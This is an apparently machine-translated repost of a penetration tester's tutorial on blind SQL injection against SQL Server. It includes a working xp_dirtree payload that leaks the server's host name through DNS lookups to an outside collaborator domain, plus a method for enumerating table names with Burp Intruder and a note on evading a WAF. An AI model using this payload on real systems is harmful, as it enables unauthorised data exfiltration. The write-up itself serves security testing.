Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to use DNS and SQLi to get data samples from the database. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

There are many ways to leak data, but did you know that you can use DNS and SQLi to get data samples from a database? Below I will introduce some techniques for enumerating and leaking data from DB servers using SQL blind injection.

In a recent Web application test, I found a potential SQLi vulnerability. I finally confirmed the existence of this SQL injection vulnerability through DNS interaction with Collaborator services using Burp. I tried to use SQLmap for some additional enumerations and leaks, but WAF blocked my request because of SQLmap header. I need another way to verify the SQLi and show that the data can be recovered from the server.

In the previous article, I showed you how to use xp_dirtree to capture the hash value of SQL Server users through SQLi. I tried the same method here, but failed due to outbound filtering on the client firewall. In addition, I quoted GracefulSecurity's article in the last article, and it will come in handy again in this article.

Even with outbound filtering, xp_dirtree can still be used to leak data from the network. This is because the SQL server must perform an DNS lookup on the target of the xp_dirtree operation. Therefore, we can add the data as the host or subdomain portion of the domain name. For example, if I set up a DNS server on collaborator.redsiege.net, I can force xp_dirtree to perform an DNS lookup on data.collaborator.redsiege.net, and my DNS server will receive queries from that host, allowing me to extract data from the request. Maybe you're still a little confused. Let's explain it with an example.

Consider the following code:

DECLARE @ data varchar (1024); SELECT @ data = (SELECT HOST_NAME ()); EXEC ('master.dbo.xp_dirtree "\\' + @ data+'.collaborator.redsiege.net\ foo$"')

In this SQL query, we declare a variable named data, which we populate with the results of SELECT HOST_NAME (), and then try xp_dirtree on\\ hostname.collaborator.redsiege.net.

My test system is called INTRUDER. Executing this query on my test system resulted in a lookup of INTRUDER.collaborator.redsiege.net, as shown below.

At this point, I know there is a reliable way to leak data, even if it needs to be done manually. Of course, for this demonstration I use SQL Server Management Studio to display the results and issue queries, but in fact this is not much different from doing this through SQLi, the only difference is that some of the queries need to be URL encoded.

In the following example, the query statement in the red box will return the table name from the Northwind database for us.

You should have noticed two SELECT statements in this query. The internal SELECT statement (called in the screenshot above) returns the top 10 results of the table names in the Northwind database, sorted in ascending alphabetical order. The external (first) SELECT statement then selects the first result of the result set sorted in descending alphabetical order. The result of this query is that we retrieve the name of the 10th table in the Northwind database. Are you a little confused? Let's break it down.

The following internal SELECT statement returns 10 results in ascending alphabetical order.

As shown below, the complete query returns only the name of the 10th table. This is because we first returned 10 results in ascending alphabetical order, and then we executed a second SELECT, which returned only the first result in descending alphabetical order. In this way, the query result will only return the 10th result in the list of table names for us.

Knowing this, we can use Intruder to iterate over all possible table names by modifying the second SELECT statement and increasing the number of results in each request.

The above is how to use DNS and SQLi to get data samples from the library. If you happen to have similar doubts, please refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.